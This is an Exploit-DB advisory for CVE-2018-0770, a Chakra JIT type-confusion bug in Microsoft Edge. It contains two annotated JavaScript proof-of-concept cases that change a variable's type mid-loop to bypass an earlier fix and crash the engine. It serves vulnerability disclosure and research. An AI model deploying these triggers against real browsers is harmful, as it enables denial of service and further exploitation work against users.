Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2)

EDB-ID: 44075
Author: Google Security Research
Published: 2018-02-15
CVE: CVE-2018-0770
Type: Dos
Platform: Windows
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

 https://github.com/Microsoft/ChakraCore/pull/4226/commits/874551dd00ff6f404e593c7e0162efb54b953f5a 

The following two test cases still bypass that fix.

1:
// Case 1: a boxed Number (an object) that is turned into a primitive
// part-way through the loop body. The loop runs exactly once (i < 1);
// what matters is the order of the three statements, not the iteration count.
function opt() {
  // 2.3023e-320 is a subnormal double; its raw 64-bit pattern is the small
  // integer 0x1234. NOTE(review): presumably chosen so that a JIT access
  // which mis-types the value dereferences an invalid address and crashes
  // (the advisory is filed as DoS) - inferred, not stated on the page.
  let obj = new Number(2.3023e-320);
  for (let i = 0; i < 1; i++) {
    // obj is a Number object here, so this property write succeeds.
    obj.x = 1;
    // Unary plus converts the wrapper object to a primitive number:
    // the type of `obj` changes inside the loop body.
    obj = +obj;
    // obj is now a primitive; there is no 'use strict' visible, so in sloppy
    // mode this write is silently discarded. Per the title, the defect is that
    // GlobOpt::OptTagChecks trusts a type/tag conclusion reached during the
    // loop pre-pass (IsLoopPrePass) instead of re-checking it here.
    obj.x = 1;
  }
}

// Driver: calls opt() repeatedly so the engine JIT-compiles it. The crash is
// presumably expected from the JIT-compiled version rather than the first
// interpreted call; the 100-call threshold is engine-specific (not stated here).
function main() {
  for (let i = 0; i < 100; i++) {
    opt();
  }
}

// Entry point for case 1.
main();

2:
// Case 2: same statement sequence as case 1, but obj starts as a primitive
// string rather than a Number object (run as a separate script from case 1,
// since both cases define opt/main with the same names).
function opt() {
  // A string whose numeric value is the same subnormal double as in case 1
  // (raw bit pattern 0x1234). NOTE(review): presumably chosen for the same
  // reason as in case 1 - inferred, not stated on the page.
  let obj = '2.3023e-320';
  for (let i = 0; i < 1; i++) {
    // obj is a primitive string; with no 'use strict' visible this write is
    // silently discarded in sloppy mode.
    obj.x = 1;
    // Unary plus converts the string to a primitive number: the type of
    // `obj` changes inside the loop body (string -> number).
    obj = +obj;
    // Same discarded write as above, now on a primitive number. Per the title,
    // the JIT's tag check for this access is decided during the loop pre-pass
    // and not revisited once the type has changed.
    obj.x = 1;
  }
}

// Driver for case 2: calls opt() repeatedly so the engine JIT-compiles it.
// The crash is presumably expected from the JIT-compiled version rather than
// the first interpreted call; the 100-call threshold is engine-specific.
function main() {
  for (let i = 0; i < 100; i++) {
    opt();
  }
}

// Entry point for case 2.
main();
